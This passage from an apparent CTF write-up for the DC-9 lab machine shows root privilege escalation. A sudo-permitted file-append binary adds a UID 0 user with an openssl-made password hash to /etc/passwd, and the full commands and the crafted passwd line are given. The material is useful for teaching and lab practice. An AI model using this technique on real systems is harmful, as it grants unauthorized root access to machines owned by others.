<p>The script takes two paths: it reads the first file and appends its contents to the second. Because sudo lets <code>fredf</code> run the compiled binary as root with <code>NOPASSWD</code>, and the script does not restrict the destination path, this is an arbitrary file-append-as-root primitive. We can use it to append a new UID 0 user to <code>/etc/passwd</code>. This works because when the password field of an <code>/etc/passwd</code> entry holds a hash instead of <code>x</code>, that hash is used for authentication and <code>/etc/shadow</code> is not consulted. (From a hardening point of view: never grant NOPASSWD sudo on a tool that accepts caller-controlled source and destination paths.)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">openssl passwd -1 -salt salt passwd</span><br><span class="line">$1$salt$XsMd08sxGRHdyFYPZh/w01</span><br></pre></td></tr></table></figure>
<p>Here <code>-1</code> selects an MD5-crypt hash, the salt is literally <code>salt</code>, and the password is literally <code>passwd</code> — remember it, it is what <code>su</code> will ask for. To match the <code>/etc/passwd</code> format, the hash must be wrapped in a full seven-field entry:</p>
<ul>
<li>username - <code>so1</code> in this case</li>
<li>salted + hashed password - the string created by openssl</li>
<li>UID - as we want to create root, we need to use <code>0</code></li>
<li>GID - same as for UID</li>
<li>home directory - we’ll use <code>/root</code></li>
<li>shell - I prefer <code>bash</code>, you can also use <code>sh</code></li>
</ul>
<p>Which leaves us with the following file content:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ cat /tmp/my_user</span><br><span class="line">so1:$1$salt$XsMd08sxGRHdyFYPZh/w01:0:0::/root:/bin/bash</span><br></pre></td></tr></table></figure>
<p>Now run the <strong>test</strong> binary through sudo. Note that the sudoers rule names the absolute path <code>/opt/devstuff/dist/test/test</code>, so either run it from that directory as below or spell out the full path:<br> <code>sudo ./test /tmp/my_user /etc/passwd</code></p>
<p><code>cat /etc/passwd</code> to verify the <code>so1</code> entry was appended.</p>
<img src="/undefined/50abf7e1/image-20230412223022323.png" class="" alt="/etc/passwd showing the appended so1 entry with UID 0">
<p>Switch to the new user with <code>su so1</code> (the password is <code>passwd</code>, as given to openssl) and confirm we are UID 0, e.g. with <code>id</code>.</p>
<img src="/undefined/50abf7e1/image-20230412223057976.png" class="" alt="Switching to so1 and confirming UID 0">
<p>Collect the proof file.</p>
<img src="/undefined/50abf7e1/proof.png" class="" alt="Proof of root on dc-9">
</div>